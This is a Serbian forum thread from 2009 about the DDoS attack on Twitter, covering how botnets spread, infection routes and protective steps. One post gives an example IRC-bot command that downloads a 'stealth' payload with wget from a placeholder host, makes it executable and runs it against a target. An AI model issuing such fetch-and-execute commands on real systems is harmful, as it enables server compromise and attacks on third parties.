Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

DDoS napad na Twitter

[es] :: Security :: DDoS napad na Twitter

Strane: 1 2

[ Pregleda: 11547 | Odgovora: 35 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

shadow88
shadow88
Tehnicar automatike i elektronike Dizel
elektro agregata
Energoglobal d.o.o
Novi Sad

Član broj: 217056
Poruke: 3065
*.dynamic.sbb.rs.

Jabber: ljubicicrobert@yahoo.com


+66 Profil

icon Re: DDoS napad na Twitter20.08.2009. u 15:34 - pre 177 meseci
uklonite antivirus sa kompa, uklonite bilo koji oblik firewall-a , pogasite sve servise koji vam nisu neophodni i vas racunar je bezbedan od napada "lutajucih virusa i hakera" :)
 
Odgovor na temu

Wajda.W
Vladimir Vajda
Zrenjanin

Član broj: 127039
Poruke: 323
79.101.194.*



+101 Profil

icon Re: DDoS napad na Twitter20.08.2009. u 17:29 - pre 177 meseci
To sa desetinom hiljada kompova sinhronizovanih je bas fino odradjen distributed programming.
Svaka cast za znanje, ali ne i za pravac....
 
Odgovor na temu

Aleksandar Đokić

Član broj: 13478
Poruke: 4793
79.101.77.*



+638 Profil

icon Re: DDoS napad na Twitter22.08.2009. u 02:35 - pre 177 meseci
ih bre Wajda.W, pa tih deset hiljada racunara je prethodno zarazeno nekom vrstom virusa koji moze da salje http zahteve, i onda su oni u jednom trenutku "naredili" tim virusima otvorite twitter.com (ili kako vec), npr. 10 racunara po 1000 naredbi nije mnogo, danas su brze veze :)
 
Odgovor na temu

Wajda.W
Vladimir Vajda
Zrenjanin

Član broj: 127039
Poruke: 323
79.101.141.*



+101 Profil

icon Re: DDoS napad na Twitter22.08.2009. u 10:29 - pre 177 meseci
@glusac Nije mnogo, znam, danasnji clusteri imaju nebrojeno vise..., ali ipak nije to lako organizovati i odraditi...
 
Odgovor na temu

priki

Član broj: 24732
Poruke: 700
*.dynamic.dsl.t-2.net.

ICQ: 174153511


+26 Profil

icon Re: DDoS napad na Twitter22.08.2009. u 19:09 - pre 177 meseci
Citat:
guslac: ih bre Wajda.W, pa tih deset hiljada racunara je prethodno zarazeno nekom vrstom virusa koji moze da salje http zahteve, i onda su oni u jednom trenutku "naredili" tim virusima otvorite twitter.com (ili kako vec), npr. 10 racunara po 1000 naredbi nije mnogo, danas su brze veze



i budu on line u isto vreme
zanimljivo
 
Odgovor na temu

Ivan Dimkovic

Administrator
Član broj: 13
Poruke: 16683
*.dip.t-dialin.net.



+7169 Profil

icon Re: DDoS napad na Twitter22.08.2009. u 19:16 - pre 177 meseci
Citat:

bas fino odradjen distributed programming.


Nije tu nista specijalno fino niti tesko - svaki klijent ima komandu da krene da trazi po IP adresama druge klijente i da im prosledi istu naredbu. Znaci dovoljno je da napadac nadje prvog klijenta prostom pretragom IP adresa grubom silom, i onda cela stvar pocinje kao lancana reakcija.

Cela stvar uopste nije teska za izvesti jer su latencija i sinhronizacija potpuno irelevantne... tj. u ovom slucaju nisu potrebne. Tako da je sam algoritam izuzetno jednostavan.

Naravno sve ovo je potpomognuto gluposcu korisnika racunara danas, koji su doveli do toga da milioni racunara sirom sveta "neguju" kojekakve trojane. Ljudska glupost je jednostavno neunistiva.

--

Daleko spektakularnije stvari kod mnogih virusa/trojana je morfizam koda i ugradjene zastite od debugginga od strane AV kompanija, neki su cak u stanju i da onda narede DDoS na IP adresu racunara koji ih debaguje. Tu je skoncentrisana najveca pamet - u slucaju kada je ima.

DigiCortex (ex. SpikeFun) - Cortical Neural Network Simulator:
http://www.digicortex.net/node/1 Videos: http://www.digicortex.net/node/17 Gallery: http://www.digicortex.net/node/25
PowerMonkey - Redyce CPU Power Waste and gain performance! - https://github.com/psyq321/PowerMonkey
 
Odgovor na temu

dulsrules
belgrade

Član broj: 75681
Poruke: 168
*.artcommunication.rs.

Sajt: www.youtube.com/dulsrules


+31 Profil

icon Re: DDoS napad na Twitter23.08.2009. u 02:26 - pre 177 meseci
Bas zanimljiva tema. Svaka cast autoru.
 
Odgovor na temu

staticInt

Član broj: 66101
Poruke: 485
91.150.106.*



+43 Profil

icon Re: DDoS napad na Twitter23.08.2009. u 12:06 - pre 177 meseci
Citat:
Ivan Dimkovic: Nije tu nista specijalno fino niti tesko - svaki klijent ima komandu da krene da trazi po IP adresama druge klijente i da im prosledi istu naredbu. Znaci dovoljno je da napadac nadje prvog klijenta prostom pretragom IP adresa grubom silom, i onda cela stvar pocinje kao lancana reakcija.

Cela stvar uopste nije teska za izvesti jer su latencija i sinhronizacija potpuno irelevantne... tj. u ovom slucaju nisu potrebne. Tako da je sam algoritam izuzetno jednostavan.

Naravno sve ovo je potpomognuto gluposcu korisnika racunara danas, koji su doveli do toga da milioni racunara sirom sveta "neguju" kojekakve trojane. Ljudska glupost je jednostavno neunistiva.

--

Daleko spektakularnije stvari kod mnogih virusa/trojana je morfizam koda i ugradjene zastite od debugginga od strane AV kompanija, neki su cak u stanju i da onda narede DDoS na IP adresu racunara koji ih debaguje. Tu je skoncentrisana najveca pamet - u slucaju kada je ima.


Ivane software koji se koristi za taj botnet je vrlo specifican zapravo to je trenutno high end trojan koji je u sustini rootkit za windows a glavna fora je kako ga spreaduju posto su velike pare u pitanju najvise ga spreaduju preko nekih servisa kojima plate odredjene pare da uz njihovu stvar prosvercuju i ovaj programcic koji radi kad zatreba. Cela ta ekipa je vrlo ozbiljna i velike su pare u igri, realno dosta korisnika ne ocekuje da se zarazi od nekih stvari koje legalno kupi tipa DVD :)
 
Odgovor na temu

musicmaster

Član broj: 50955
Poruke: 1447
212.200.192.*



+7 Profil

icon Re: DDoS napad na Twitter23.08.2009. u 12:32 - pre 177 meseci
Sama pomisao da ljudi treba da crvkuću umesto da komuniciraju je blago rečeno - užasavajuća.
Ako. Neka. Sve ovo je dobro.
 
Odgovor na temu

zemun88
Beograd - Zemun, Srbija

Član broj: 152727
Poruke: 442
*.artcommunication.rs.



+112 Profil

icon Re: DDoS napad na Twitter23.08.2009. u 20:26 - pre 177 meseci
Mozete mi vi koji ste iskusni u radu na racunarima, da mi odgovorite kako oni to kontrolisu racunare. Znam da svaki haker moze da napadne koji god hoce racunar, ali da li je i dovoljno da korisnici paze sta posecuju na internetu, sta skidaju, koji imaju antivirus, koje programe...

Ja mislim da su i korisnici krivi u svoj toj situaciji. Vecina njih nije ni podesila privatnost na fejsbuku, twitteru i ostalim servisima. Koriste zastareli softver i samo klikcu ko ovcice po internetu. Mislim da bi bilo dobro da se kod nas izda neki prirucnik ministarstva ili da se napravi neka jedinstvena stranica za Srbiju na kojoj ce strucnjaci iz IT sektora preporucivati kako da se korisnici zastite na iternetu, ali kako i da zastite svoju privatnost na socijalnim servisima na internetu. Ja mislim da je bar polovina korisnika interneta nepismena, ali zbog toga sto ne znaju kako da koriste svoj racunar i internet na najbolji nacin.

Zanima me komentar vas iskusnijih korisnika
 
Odgovor na temu

Ivan Dimkovic

Administrator
Član broj: 13
Poruke: 16683
*.dip.t-dialin.net.



+7169 Profil

icon Re: DDoS napad na Twitter23.08.2009. u 20:32 - pre 177 meseci
Citat:
staticInt
Ivane software koji se koristi za taj botnet je vrlo specifican zapravo to je trenutno high end trojan koji je u sustini rootkit za windows a glavna fora je kako ga spreaduju posto su velike pare u pitanju najvise ga spreaduju preko nekih servisa kojima plate odredjene pare da uz njihovu stvar prosvercuju i ovaj programcic koji radi kad zatreba. Cela ta ekipa je vrlo ozbiljna i velike su pare u igri, realno dosta korisnika ne ocekuje da se zarazi od nekih stvari koje legalno kupi tipa DVD :)


Moja analiza je bila iskljucivo fokusirana na tehnicki deo DDoS softvera - taj softver je relativno prost ako se izuzmu anti-debug mere koje postoje u nekim od trojana.

Naravno, distribucija istih virusa/trojana je ogroman biznis - bas kao i industrija SPAM-a... Ali, vidis - bas kao i za SPAM, procena je da jedan od manje od sto hiljada ljudi nesto kupi sa SPAM mail-a, pa se opet cela stvar isplati.

Trojanci su jos isplativiji jer se sa njima "pecaju" brojevi kreditnih kartica, socijalnog osiguranja, dolazi se do sifri za pristup online bankingu, licnih podataka itd...

Opet - kao sto rekoh, za postojanje toga se najvise mozemo zahvaliti tehnickoj nepismenosti prosecnog korisnika racunara - doduse, drugi deo krivice snosi Microsoft zbog skandalozno lose sigurnosti svojih operativnih sistema sve do kasne 2003-ce godine - a matorih instalacija XP-a, Win98-mice i sl.. imas koliko hoces.

Citat:
zemun88
Mozete mi vi koji ste iskusni u radu na racunarima, da mi odgovorite kako oni to kontrolisu racunare. Znam da svaki haker moze da napadne koji god hoce racunar, ali da li je i dovoljno da korisnici paze sta posecuju na internetu, sta skidaju, koji imaju antivirus, koje programe...


Racunar se ne moze "kontrolisati" od strane hakera dok se ne inficira sa nekim trojancem / virusom. A to se moze uciniti na mali milion nacina:

1. Skidanjem izvrsnih fajlova sa "levih" sajtova (programa, igrica...)
2. Pakovanjem virusa/trojanaca na opticke medije gde ce ih korisnik izvrsiti ili sa AutoRun-om na starim verzijama Windows-a, ili ce kliknuti na njih

3. Slanjem mailova sa virusima/trojancima upakovanih kao "slike", "pornjava" i sl...

4. Koriscenjem propusta u softveru koji koristi korisnik - tipa Adobe Flash, IE, Firefox - ovo je najtezi deo za napraviti, ali i najtezi za uociti od strane korisnika

Itd...
DigiCortex (ex. SpikeFun) - Cortical Neural Network Simulator:
http://www.digicortex.net/node/1 Videos: http://www.digicortex.net/node/17 Gallery: http://www.digicortex.net/node/25
PowerMonkey - Redyce CPU Power Waste and gain performance! - https://github.com/psyq321/PowerMonkey
 
Odgovor na temu

zemun88
Beograd - Zemun, Srbija

Član broj: 152727
Poruke: 442
*.artcommunication.rs.



+112 Profil

icon Re: DDoS napad na Twitter23.08.2009. u 20:47 - pre 177 meseci
Hvala na odgovoru

Znaci treba uraditi sledece da bi se ublazio ili sprecio napad virusa:

Skeniranje svakog flesa ili cd-a koji se ubaci u racunar
Skeniranje svakog fajla koji se skine sa interneta
Redovan apdejt softvera
Azuriranje Mozile, Opere, IE...
Redovno azuriranje antivirusa
Koriscenje jos jednog antimalware programa
Brisanje spam poruka

Sto se tice brisanja spam poruka, onda ni ne treba koristiti imejl postu provajdera i outlook express jer je najbolji nacin da se dobije virus, tj. najslabije filtriranje spam poruka

Ako je onda to velika vecina stvari koje treba uraditi, onda je samo krivica ljudi za veliki broj napada

Hvala na odgovoru
 
Odgovor na temu

Albus
bg

Član broj: 60922
Poruke: 43
79.101.39.*



Profil

icon Re: DDoS napad na Twitter25.08.2009. u 13:59 - pre 177 meseci
Pa i nije da nije mnogo...
 
Odgovor na temu

Darklord
Linux System Administrator
Subotica

Član broj: 30588
Poruke: 559
*.adsl-4.sezampro.yu.



+46 Profil

icon Re: DDoS napad na Twitter03.10.2009. u 09:21 - pre 176 meseci
Da bi bili sigurni da vas racunar nije zarazen nekim virusom koji napada druge racunare otvorite cmd i kucajte netstat ukoliko nadjete zahtev SYN_SEND na mnogo adresa, znaci da ste zarazeni.

Inace napraviti botnet je veoma jednostavno.. I ne zahteva neki filozofiju. Razlikuju se 2 vrste botnet obicnih korisnika (kucni racunari sa slabim uploadom do 1mbps) serveri sa 10,100 ili vise mbps uploada.

Za obaranje 1 sajta dovoljan vam je ponekad i 1 - 2 servera. Nema neke velike filozofije kako "zaraziti server" mnoge skripte ili CMS sistemi (joomla ili mambo itd..) imaju pristup pisanju u /tmp direktorijum gde upisuju sesije i stvari koje su im trenutno potrebne.

Sa rupom u kodu ljudi naprave exploit gde se uz odredjene http zahteve na CMS postavi bot koji se konektuje na irc mrezu i kontrolise se globalno ( botovi u jednom kanalu) primaju komande tipa .unixkomada. Recimo .wget http://IP/~test/stealth; .chmod +x stealth; ./stealth IP port

Ovo je veoma mocna alatka za napadanje. Krivci za ovaj propust na serveru su prvobitno autori cms sistema ali posto je to besplatan software na administratoru sistema je da se bolje zastiti od ovih upada. A da svoj server zastiti od mogucnosti da napada druge racunare najbolje je da doda pravilo u fw da zabrani slanje sa servera na sve portove a da dozvoli na one koji su potrebni.

Ovo je output kada pokusate da saljete sa servera, pokrenuo sam nmap, ip koji sam skenirao cu zamaskirati zvezdama.

sendto in send_ip_packet: sendto(5, packet, 44, 0, *.*.*.*, 16) => Operation not permitted
sendto in send_ip_packet: sendto(5, packet, 44, 0, *.*.*.*, 16) => Operation not permitted
sendto in send_ip_packet: sendto(5, packet, 44, 0, *.*.*.*, 16) => Operation not permitted
sendto in send_ip_packet: sendto(5, packet, 44, 0, *.*.*.*, 16) => Operation not permitted
sendto in send_ip_packet: sendto(5, packet, 44, 0, *.*.*.*, 16) => Operation not permitted


Ko nije znao nadam se da sada malo vise razume u vezi ovih napada. Jos jedna stvar mnogi ljudi mesaju DoS i DDoS napad je isti razlika je sto se prvi napad izvrsava sa 1 adrese a drugi napad je sinhronizovan napad (isto vreme u sekudni! :) ) vise adresa sto sama rec distributed govori.

Danijel,
http://www.adiswitch.com/
---------------------------------------
Na društvenim mrežama.
http://www.facebook.com/adiswitchdoo
https://twitter.com/#!/adiswitch
---------------------------------------
 
Odgovor na temu

deepwhite

Član broj: 92996
Poruke: 559
212.200.70.*



+3 Profil

icon Re: DDoS napad na Twitter06.10.2009. u 11:24 - pre 176 meseci
Vrlo bitna stvar i najcesci ulaz virusa u kompove je softver sa torenta. I to nije samo do "crack.exe" nego i cab fajlovi ih sadrze, tako da su sakriveni od skeniranja antivirusima. Mene je do nedavno ubijao system proces jer je kernel time ponekad gurao na 100%, ni jedan antivirus nije mogao da provali kako i odakle ulazi. Uzmem desetak dana pred sebe, reinstaliram win 20-tak puta i otkrijem da se preko instalacija poweriso i winrar-a identican viruscic ugnezdi u system32 i radi samo njemu znane stvari i to iskljucivo u trenucima kad se graficka koristi intenzivnije.
 
Odgovor na temu

[es] :: Security :: DDoS napad na Twitter

Strane: 1 2

[ Pregleda: 11547 | Odgovora: 35 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.